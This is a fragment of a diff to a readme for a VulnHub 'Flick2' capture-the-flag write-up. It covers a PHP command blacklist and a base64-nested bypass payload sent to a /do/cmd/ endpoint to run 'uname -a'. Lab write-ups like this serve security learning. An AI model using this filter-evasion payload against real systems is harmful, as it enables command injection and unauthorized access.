klezVirus/Posts/reviews/vulnhub/flick2/readme.md

 if(0 < count(array_intersect(array_map('strtolower', explode(' ', $command)), $bad_commands))) {...}
 ```

-The creator of the app, says that this blacklisting method is **SUPER** FAIL, and that should be the point.
+The creator of the app, says that this blacklisting method is **SUPER FAIL**, and that should be the point.
 He gave us even a bypass PoC, below:

 ```bash
 /do/cmd/$(echo -n "\$(echo "`echo 'uname -a' | base64`" | base64 -d)" | base64)